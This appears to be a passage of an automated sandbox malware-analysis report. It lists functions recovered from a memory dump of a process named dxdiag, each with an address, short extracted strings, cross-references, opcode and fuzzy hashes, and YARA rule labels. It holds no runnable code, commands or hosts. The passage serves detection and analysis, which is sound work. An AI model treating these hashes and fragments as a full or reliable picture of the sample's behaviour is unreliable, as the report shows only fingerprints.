Opcode Fuzzy Hash: 411c911b66ffff2e9b30ef3c3b7db8ad7d55e8e77a8e129a3cd9494ef06f664d
Instruction Fuzzy Hash: 76415872A483904BD318CF69C89239BBFE2EB96304F04496DF5C597381D7BAC9058B86

Function 0042683C Relevance: 6.8, Strings: 5, Instructions: 527COMMON

Download Yara Rule

Strings

2lB, xrefs: 00426C2C
bpB, xrefs: 00426FE2
2pB, xrefs: 00426FDC
", xrefs: 00426EA2
nB, xrefs: 00426D8C

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: nB$"$2lB$2pB$bpB
API String ID: 0-1940457101
Opcode ID: 8de7e067c5cac23f0f4fd2df2c49999167b566e3c728dc8f48f6de7cf320b789
Instruction ID: 558fbc4cb8a2958d1f7e7249d7ccc9316d198c96dd93b6a73ccfed5fe5d12803
Opcode Fuzzy Hash: 8de7e067c5cac23f0f4fd2df2c49999167b566e3c728dc8f48f6de7cf320b789
Instruction Fuzzy Hash: 6B020375608351CFD714DF28D88032AFBE2BF9A320F198A6DE4A5873E1E778D9058B45

Function 00424DD0 Relevance: 6.6, Strings: 5, Instructions: 369COMMON

Download Yara Rule

Strings

V,, xrefs: 00424E6F
Z[, xrefs: 00424E7F
^E, xrefs: 00424E67
pqr, xrefs: 00424F87
,Y, xrefs: 00424E77

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: ,Y$V,$Z[$^E$pqr
API String ID: 0-279934592
Opcode ID: 87f78cd21d4e01dd81e271a37c7c4b9a528862636fb1b6678b2c431f50833107
Instruction ID: 5742babc61ebacdb7949157f0bd4e01d84a0f7fb4511d1348a61e7c30121f0f1
Opcode Fuzzy Hash: 87f78cd21d4e01dd81e271a37c7c4b9a528862636fb1b6678b2c431f50833107
Instruction Fuzzy Hash: E2D10FB4608341DFE724CF20E881B6FBBA0FB86704F94892DE68597391D778D905CB4A

Function 00409730 Relevance: 5.4, Strings: 4, Instructions: 352COMMON

Download Yara Rule

Strings

976E25EBFC839FDD5EC6468C5C963249, xrefs: 004097E0
rt, xrefs: 004099B0
53/L, xrefs: 00409831
&', xrefs: 00409AE3

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: &'$53/L$976E25EBFC839FDD5EC6468C5C963249$rt
API String ID: 0-1304976474
Opcode ID: 3d479a76f3ed01d2210f7306c98ef1b6a839f767a8772c77676ee1babf76fe85
Instruction ID: c43cc0f4767f0386331e86a65d878f221811e9f74dfb90e72f7e2679060c6ec5
Opcode Fuzzy Hash: 3d479a76f3ed01d2210f7306c98ef1b6a839f767a8772c77676ee1babf76fe85
Instruction Fuzzy Hash: 19A100B050C3808BD314DF358890A6FBBE4EF92314F14496DE1E69B3A2D738D90ACB56

Function 0041BB20 Relevance: 5.3, Strings: 4, Instructions: 310COMMON

Download Yara Rule

Strings

stu, xrefs: 0041BC18
LM, xrefs: 0041BCA8
KT, xrefs: 0041BD42
OM, xrefs: 0041BD52

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: KT$LM$OM$stu
API String ID: 0-2300950273
Opcode ID: a0c85d8ade89f4d732e1c7db4051fb16378b39335d085899007dfca62cd4281c
Instruction ID: e0790f8a2260445ed915882484265c43d046fe5b7e2851accbdc848ea5d765e3
Opcode Fuzzy Hash: a0c85d8ade89f4d732e1c7db4051fb16378b39335d085899007dfca62cd4281c
Instruction Fuzzy Hash: 37A1BC7660C3449BD704EF26D8914AFBBF6EB96310F444C2DF4D687342D6398A098B9A

Function 00419219 Relevance: 5.3, Strings: 4, Instructions: 274COMMON

Download Yara Rule

Strings

.tv, xrefs: 00418F08
`, xrefs: 00418E50
KL, xrefs: 00418F6D
D, xrefs: 0041920A

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: .tv$D$KL$`
API String ID: 0-1798403091
Opcode ID: 90e57625ad38b70126a8750b87c4af5a01a1fc3e7287f70fed15274c53c4e676
Instruction ID: 3f30fe60f5f3189d76d806e3d19590f01995e251e5eb8f492cdef6a97151cc10
Opcode Fuzzy Hash: 90e57625ad38b70126a8750b87c4af5a01a1fc3e7287f70fed15274c53c4e676
Instruction Fuzzy Hash: 4291ABB04083918BE334CF24C4A57ABBBE1FF86314F158A5DD4C94B392D7798885CB9A

Function 00421D73 Relevance: 4.5, Strings: 3, Instructions: 737COMMON

Download Yara Rule

Strings

2-:., xrefs: 00421F08
#'!7, xrefs: 00421E3F
<r/+, xrefs: 00421E47

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: #'!7$2-:.$<r/+
API String ID: 0-1588113804
Opcode ID: 1223cc3a21a772a0d2f2494d54565a2756d6f36c6719582f613429b6c81c700c
Instruction ID: f9fba50b878ae6ca9efe469270682ac7877d2de3c9241f307d5b60eb0439a20b
Opcode Fuzzy Hash: 1223cc3a21a772a0d2f2494d54565a2756d6f36c6719582f613429b6c81c700c
Instruction Fuzzy Hash: 14322276A08212CFD318CF28DC9166AB3E2FF89314F49853DE99597390D7B8D901CB85

Function 0042779B Relevance: 4.2, Strings: 3, Instructions: 443COMMON

Download Yara Rule

Strings

9, xrefs: 004279DD, 00427A26
9, xrefs: 00427A62
yz, xrefs: 004279C2

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 9$9$yz
API String ID: 0-3458379945
Opcode ID: 97e5fe8962bbb79f1b9a7ddb6f8aa47842b1dc16bf743edd73e6bddcf6dbf477
Instruction ID: 8cb2bd10700cf6573130ed67dfada133875a43ff1573faf34ad6f8871ffd4bd0
Opcode Fuzzy Hash: 97e5fe8962bbb79f1b9a7ddb6f8aa47842b1dc16bf743edd73e6bddcf6dbf477
Instruction Fuzzy Hash: C2C130B6A0C3118BC714DF68D85262BB3F1EFC1314F18892EE4D69B391E7789A05C75A

Function 004277E0 Relevance: 4.2, Strings: 3, Instructions: 436COMMON

Download Yara Rule

Strings

9, xrefs: 004279DD, 00427A26
9, xrefs: 00427A62
yz, xrefs: 004279C2

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 9$9$yz
API String ID: 0-3458379945
Opcode ID: 1ca6f33f7db7d5da2e48699969a0ed4e89dc9ac7e0041adc56acc3958d548636
Instruction ID: bbb38220efc2b624f5925e2889de6455b8c212916dff37784df4ba08f5a7ac67
Opcode Fuzzy Hash: 1ca6f33f7db7d5da2e48699969a0ed4e89dc9ac7e0041adc56acc3958d548636
Instruction Fuzzy Hash: ABC120B660C3118BC7249F68D85262BB3F1EFC1314F18892EE4D69B391E7789A05C75A

Function 00436BE4 Relevance: 4.2, Strings: 3, Instructions: 426COMMON

Download Yara Rule

Strings

&', xrefs: 00436E82
x#X%, xrefs: 00436E95
:, xrefs: 004370D4

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: &'$:$x#X%
API String ID: 0-3823454105
Opcode ID: 6afc1bf7648736bdd623afcef6bc591dcf5bfd5d666ccb6253b7929a179191ea
Instruction ID: 8f3827cfcbc4e38f67a50f9a1e96b6c0906f4e5a80d62fafde117fdb12ab2f56
Opcode Fuzzy Hash: 6afc1bf7648736bdd623afcef6bc591dcf5bfd5d666ccb6253b7929a179191ea
Instruction Fuzzy Hash: A4D1277A618652CBCB185F24E86237B73E1FF4A745F0B807ED482872A1EB798950CB45

Function 00415460 Relevance: 4.2, Strings: 3, Instructions: 408COMMON

Download Yara Rule

Strings

OG, xrefs: 004156CD
pw, xrefs: 004156C2
pYA, xrefs: 0041596A

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: OG$pYA$pw
API String ID: 0-4264688152
Opcode ID: 6415562d6c1008e6fe1d99e2b67bdb73ebf9c9cca06134cedbe07d6db5d92b51
Instruction ID: 4159aafd9c10dcdb92f5b7ab8577220b838cb96e890b31dd2f5e1bbf81f70fed
Opcode Fuzzy Hash: 6415562d6c1008e6fe1d99e2b67bdb73ebf9c9cca06134cedbe07d6db5d92b51
Instruction Fuzzy Hash: 3DC12374548341CBD7349F24D891BEB73A1EF96314F044A3DE4D98B3A1EB389981CB9A

Function 0042A9D5 Relevance: 4.1, Strings: 3, Instructions: 388COMMON

Download Yara Rule

Strings

d, xrefs: 0042ABAD
ztbk, xrefs: 0042AD34
X\j_, xrefs: 0042AC49

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: X\j_$d$ztbk
API String ID: 0-161409437
Opcode ID: 178e0c69511cf786b98128b254f0426a957d5df6ad6af87ce70e9a0989f1dd82
Instruction ID: c647836b6919da90344013ba879caa2c0c0a118e64d05fdf5bbca9858e4c4854
Opcode Fuzzy Hash: 178e0c69511cf786b98128b254f0426a957d5df6ad6af87ce70e9a0989f1dd82
Instruction Fuzzy Hash: 7DB146712047918FD329CF29C450723FBE2AF86300F69C69EC8D68B796C678E802CB55

Function 0042AA8A Relevance: 4.1, Strings: 3, Instructions: 365COMMON

Download Yara Rule

Strings

d, xrefs: 0042ABAD
ztbk, xrefs: 0042AD34
X\j_, xrefs: 0042AC49

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: X\j_$d$ztbk
API String ID: 0-161409437
Opcode ID: c138dd2b7c66af969763d4e987df7e41070ed8ccd11516e73ecb22322106a9ee
Instruction ID: 63ec9625d8e1e38da1926b311d6272fb904936b9087af233feddb224084f3342
Opcode Fuzzy Hash: c138dd2b7c66af969763d4e987df7e41070ed8ccd11516e73ecb22322106a9ee
Instruction Fuzzy Hash: A9A158712047918FD329CF29C450722FBE2AF86304F69C69EC9D68B792C778D812CB55

Function 0042AAD7 Relevance: 4.1, Strings: 3, Instructions: 364COMMON

Download Yara Rule

Strings

d, xrefs: 0042ABAD
ztbk, xrefs: 0042AD34
X\j_, xrefs: 0042AC49

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: X\j_$d$ztbk
API String ID: 0-161409437
Opcode ID: 14fc744518a8a4fa68d9e00823f089d1af0127733397b98013bd6eb39e02983f
Instruction ID: 69c4823cc23e329729b65d6cd6aa0dd4aae8d762435b1c1a1192b9f4453f2a0f
Opcode Fuzzy Hash: 14fc744518a8a4fa68d9e00823f089d1af0127733397b98013bd6eb39e02983f
Instruction Fuzzy Hash: D6A148712047918FD329CF29C490722FBE2AF86304F69C69EC9D68B792C779D842CB55

Function 0042AAC6 Relevance: 4.1, Strings: 3, Instructions: 339COMMON

Download Yara Rule

Strings

d, xrefs: 0042ABAD
ztbk, xrefs: 0042AD34
X\j_, xrefs: 0042AC49

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: X\j_$d$ztbk
API String ID: 0-161409437
Opcode ID: b044eee7a262e571ea12573e6cf26b9f4d54e30ac2eb5059c67a4872f77a546c
Instruction ID: b77578477651018fdeaac84c335eda1cf7dbe90ebbcab35e646ae95f6ad1400d
Opcode Fuzzy Hash: b044eee7a262e571ea12573e6cf26b9f4d54e30ac2eb5059c67a4872f77a546c
Instruction Fuzzy Hash: 17A168712047918FD325CF29C490722FBE2AF96300F6D869EC4D68B786C778D802CB65

Function 004230C0 Relevance: 4.0, Strings: 3, Instructions: 285COMMON

Download Yara Rule

Strings

3zx[, xrefs: 00422EBA
@B, xrefs: 004230FA
qzx[, xrefs: 00422EE0

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 3zx[$qzx[$@B
API String ID: 0-149612330
Opcode ID: 17b5d7aecd68ee84dfd04b24f533ecaaf5dbf0cb7ca230442a63f74c25e47d9e
Instruction ID: 9e4b87dcb06e457d0f9d11912b9a92467ef5426d1500ae2c30e3006a4d20d98e
Opcode Fuzzy Hash: 17b5d7aecd68ee84dfd04b24f533ecaaf5dbf0cb7ca230442a63f74c25e47d9e
Instruction Fuzzy Hash: 9AA14471A043509FE724CF68CD41BAEBBB1FB85700F0541AEE905AF392D7759902CB95

Function 0040DEE9 Relevance: 3.9, Strings: 3, Instructions: 140COMMON

Download Yara Rule

Strings

VwWy, xrefs: 0040DF1C
su, xrefs: 0040DF15
)LWt, xrefs: 0040E10D

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: )LWt$VwWy$su
API String ID: 0-3217031312
Opcode ID: df3abb5220737b9bf04c5bae9f03c91a1aa6ed068ceafdad675784e96d291a5e
Instruction ID: 30f66bfa02c826f192fa745d1aa3d8111df13ee3ec6becbcaa5c5be03c67a3cc
Opcode Fuzzy Hash: df3abb5220737b9bf04c5bae9f03c91a1aa6ed068ceafdad675784e96d291a5e
Instruction Fuzzy Hash: 44510FB0201711ABD3248F21C495722BBB1BB19308F24969CD1861FB96D3BBE457CF88

Function 00414860 Relevance: 3.6, Strings: 2, Instructions: 1055COMMON

Download Yara Rule

Strings

KA, xrefs: 00414BDA
4l, xrefs: 004149EB

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 4l$KA
API String ID: 0-2227922710
Opcode ID: ece183665e9cd0250bda4baa08dea94051610fd0a3949e522ee096408b33f542
Instruction ID: 7d394960c13b993b07ff0ec63b5c916a70d7b749b6eef6e0c3313fbac85af60e
Opcode Fuzzy Hash: ece183665e9cd0250bda4baa08dea94051610fd0a3949e522ee096408b33f542
Instruction Fuzzy Hash: 55421475608301CBE714DF24DC42ABB73A1FBC6314F19853EE58587391E7799885CB8A

Function 00404C50 Relevance: 3.3, Strings: 2, Instructions: 805COMMON

Download Yara Rule

Strings

8, xrefs: 00405594
0, xrefs: 0040559C

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 4d31846ea3cd1676bcc8b5810d49a0c429a9bcd0f11c617c85cd4880b3a76c6f
Instruction ID: 6370abf147319fefda308a2038e70a02aa4510a212c48b2156ced0c66922abe4
Opcode Fuzzy Hash: 4d31846ea3cd1676bcc8b5810d49a0c429a9bcd0f11c617c85cd4880b3a76c6f
Instruction Fuzzy Hash: A27224B16083419FD710CF18C880B9BBBE1AF94354F04892EF9999B392D379D958CF96

Function 00438D70 Relevance: 3.3, Strings: 2, Instructions: 755COMMON

Download Yara Rule

Strings

g, xrefs: 00439234
f, xrefs: 00439021

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID: f$g
API String ID: 2994545307-2729975458
Opcode ID: 4cd79b717976fae15cbbecf2b362b45576482f5731d1ef7c12f67a79aa4caa16
Instruction ID: c9b2282577dd7928e87c6e7aed450861025ac80ca66e243a85fcddc34fbf70c2
Opcode Fuzzy Hash: 4cd79b717976fae15cbbecf2b362b45576482f5731d1ef7c12f67a79aa4caa16
Instruction Fuzzy Hash: 1F3204756083419FD714CF28C880A2FBBE2ABC9314F299A2EE5D597391CB75DC41CB4A

Function 00416CBD Relevance: 3.2, Strings: 2, Instructions: 743COMMON

Download Yara Rule

Strings

+, xrefs: 00416FFE
W, xrefs: 0041768A

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: +$W
API String ID: 0-3485357538
Opcode ID: 6a21d55a5fbcc48de4ab3196158e1f9afa0471f8b48752441063c17706421383
Instruction ID: 7f43de0d9f64e876bdb76b0051892af2d1d95dcac743c0c21e269c463886ecd5
Opcode Fuzzy Hash: 6a21d55a5fbcc48de4ab3196158e1f9afa0471f8b48752441063c17706421383
Instruction Fuzzy Hash: C4322571A083518BD324CF28C8907ABBBE1FFCA314F198A6EE4C597351DB789941CB56

Function 00425820 Relevance: 3.1, Strings: 2, Instructions: 614COMMON

Download Yara Rule

Strings

dZB, xrefs: 00425A4D
r`B, xrefs: 00426065

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: dZB$r`B
API String ID: 0-3904460924
Opcode ID: 0a9eee2e05ad593b87d1a35673dacdee6d4f1f71470903015ce88b7b45ba2a2a
Instruction ID: cf11a58a00d61d500a6140a78dc3910c7a963cd34266b10506d1b50124c2a4e1
Opcode Fuzzy Hash: 0a9eee2e05ad593b87d1a35673dacdee6d4f1f71470903015ce88b7b45ba2a2a
Instruction Fuzzy Hash: D11245B460C3918BD710CF25E89126FBBE0EF96308F54896DE4C69B382D778D905CB5A

Function 00415FA1 Relevance: 3.1, Strings: 2, Instructions: 606COMMON

Download Yara Rule

Strings

ofA, xrefs: 00416668
, xrefs: 0041600D, 00416097

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: ofA$
API String ID: 0-1552613143
Opcode ID: e826f98870c836bfb8e0ea51c571821792422a0c5e161fdc289a0df1255da1a3
Instruction ID: 2c823ed54a2d2150a2d94358e89aa5dd56cf77a80caffb394fd748b267586704
Opcode Fuzzy Hash: e826f98870c836bfb8e0ea51c571821792422a0c5e161fdc289a0df1255da1a3
Instruction Fuzzy Hash: E51237756083509FD724CF28DC917AF77E2EB86314F154A3DE48A87291DB39D841CB8A

Function 004231F6 Relevance: 3.0, Strings: 2, Instructions: 524COMMON

Download Yara Rule

Strings

}~, xrefs: 004234C0
R9B, xrefs: 00423941

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: R9B$}~
API String ID: 0-2143352738
Opcode ID: a20bea4d2debd35d1aa5696fec164c130505b818f13da4c4dcc747a5536a5dc6
Instruction ID: c67b400d593570aea51a5883cfaab9404424982819ae66ceb36794941c5778d7
Opcode Fuzzy Hash: a20bea4d2debd35d1aa5696fec164c130505b818f13da4c4dcc747a5536a5dc6
Instruction Fuzzy Hash: BEF12276A18321DBC724DF24D8411ABB3F2FF85742F88896DE48597260E73C9B45CB49

Function 0041BE71 Relevance: 2.8, Strings: 2, Instructions: 349COMMON

Download Yara Rule

Strings

ij, xrefs: 0041BFD5
N%&', xrefs: 0041C2CD, 0041C2DA

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: N%&'$ij
API String ID: 0-2336341608
Opcode ID: 88f5ead50482a0d5692fe065ff7ab871ef9c8578c732ac1c41b12b274cf9b7f8
Instruction ID: 3ec1164c08b8df8f5ad239da4b50aaa16cb908530bffe58995966572d7d06e5a
Opcode Fuzzy Hash: 88f5ead50482a0d5692fe065ff7ab871ef9c8578c732ac1c41b12b274cf9b7f8
Instruction Fuzzy Hash: 63913375A483008BC714CF69CC913ABB7E2EFD9314F08C96DE8C68B385E7789585875A

Function 00404300 Relevance: 2.8, Strings: 2, Instructions: 335COMMON

Download Yara Rule

Strings

IEND, xrefs: 004046FD
), xrefs: 00404379

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 18bf37ad41109e80a1a09e8aa62cffcf334b86b9c7745820e439ec832c58c8b6
Instruction ID: 69784f994d522c806696069fb0bc0fba4b22834945d23ce78d0c5b6699577816
Opcode Fuzzy Hash: 18bf37ad41109e80a1a09e8aa62cffcf334b86b9c7745820e439ec832c58c8b6
Instruction Fuzzy Hash: F2D191B19083449FD710CF15D841B5FBBE4AB94308F14492EFA99AB3C2D779E908CB96

Function 0040C72B Relevance: 2.8, Strings: 2, Instructions: 256COMMON

Download Yara Rule

Strings

./, xrefs: 0040C8F4
h3T5, xrefs: 0040C8BC

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: ./$h3T5
API String ID: 0-2425256910
Opcode ID: a2b2180c65d7394546b7c1e0cf6cc2ed789f617f73c682bd2d84fc2d095af9de
Instruction ID: 8875d4901756c4b216268357a0ac996a12432350b8b0083aa304c3f513ba26e0
Opcode Fuzzy Hash: a2b2180c65d7394546b7c1e0cf6cc2ed789f617f73c682bd2d84fc2d095af9de
Instruction Fuzzy Hash: EA7114B651C3409AC718DF24CC9117BB7B2EFD5304F19962DE89567391EB38860AC78D

Function 0040FB71 Relevance: 2.3, Strings: 1, Instructions: 1089COMMON

Download Yara Rule

Strings

+, xrefs: 004106BC

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID: +
API String ID: 2994545307-2126386893
Opcode ID: e49cc565bb25ea712ded7a77cb7fabab62f070ab26babbd63597e6b6ddc6b1e9
Instruction ID: 1a842e94016ed2d8c532f852bc49d7d4a1e2a2dd1db2aad469a581af37c970af
Opcode Fuzzy Hash: e49cc565bb25ea712ded7a77cb7fabab62f070ab26babbd63597e6b6ddc6b1e9
Instruction Fuzzy Hash: C9924EB1604B408FD324DF38C5953ABBBE2AB95314F18893ED4EB873C2DA78A545C746

Function 004181E9 Relevance: 2.0, Strings: 1, Instructions: 793COMMON

Download Yara Rule

Strings

", xrefs: 004188EE

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID: "
API String ID: 2994545307-123907689
Opcode ID: 9c24db7ea9b62738beb93c1e0c77958b4322bda01f0c3960b2e70158945ec4ff
Instruction ID: 17df69645741845f95c7c20def89238328e3832f630206f777091f64e93cc147
Opcode Fuzzy Hash: 9c24db7ea9b62738beb93c1e0c77958b4322bda01f0c3960b2e70158945ec4ff
Instruction Fuzzy Hash: 73224B746083408BD7258F28D8506BFB7E2FB96314F285A2DE4D157392DB38D842CB9E

Function 004216E0 Relevance: 1.7, Strings: 1, Instructions: 457COMMON

Download Yara Rule

Strings

o]^, xrefs: 0042191D

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: o]^
API String ID: 0-3943879297
Opcode ID: e60bd4a8b9da6522f1b3359eba3995bbb3ba7a4471dfa0ff8ca762107fd0de44
Instruction ID: 4669969d7b71f7d68a9b592d0a4a540a5b8527d65a8744ebe538e10e24e07286
Opcode Fuzzy Hash: e60bd4a8b9da6522f1b3359eba3995bbb3ba7a4471dfa0ff8ca762107fd0de44
Instruction Fuzzy Hash: 58B16C72B083205BD714DB24E89277BB3A1EFE1354F59842EE88557391E63CE805C39A

Function 0041C330 Relevance: 1.7, Strings: 1, Instructions: 443COMMON

Download Yara Rule

Strings

q, xrefs: 0041C3FA

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: q
API String ID: 0-1973602202
Opcode ID: 3144f0c7d77c94f0b15253ad0cdaa548fa628ab49627c29bc90b5f25244d2502
Instruction ID: b69d45c65629a181d3394273b162446badd9582a993c74671e4135a58d3492d1
Opcode Fuzzy Hash: 3144f0c7d77c94f0b15253ad0cdaa548fa628ab49627c29bc90b5f25244d2502
Instruction Fuzzy Hash: 8BC10075A583108BC7248F28CC913ABB3F1EF96314F48992DE8C59B394E778D944C78A

Function 00427C0F Relevance: 1.6, Strings: 1, Instructions: 324COMMON

Download Yara Rule

Strings

{B, xrefs: 00427BE2, 00427FE0

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: {B
API String ID: 0-2955416605
Opcode ID: b0bd08c29f9365885b933f1cf599b0cb6fa5fdb634cbb513a89aaee83ecc68c5
Instruction ID: 125d85a474e2c54c7edf7e8372bc309e0328607fb292080dea6794c80479f12b
Opcode Fuzzy Hash: b0bd08c29f9365885b933f1cf599b0cb6fa5fdb634cbb513a89aaee83ecc68c5
Instruction Fuzzy Hash: C3A145B5A0C3508FD7108F28D89222BBBE1AF86304F54883EF5D58B352E638D905CB97

Function 00405E40 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

,, xrefs: 00405F76

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: f4f7a47380c80d9f1d47d0d0c507c35257674a6dd286f39611ef468fd00499a1
Instruction ID: 51a14242803ecae43574cd839083da134051b3b3a324024ad900f53de0fcc2f5
Opcode Fuzzy Hash: f4f7a47380c80d9f1d47d0d0c507c35257674a6dd286f39611ef468fd00499a1
Instruction Fuzzy Hash: C5B149712097819FD325CF18C88061BFBE0AFA9704F544E2DE5D997382D635EA18CBA7

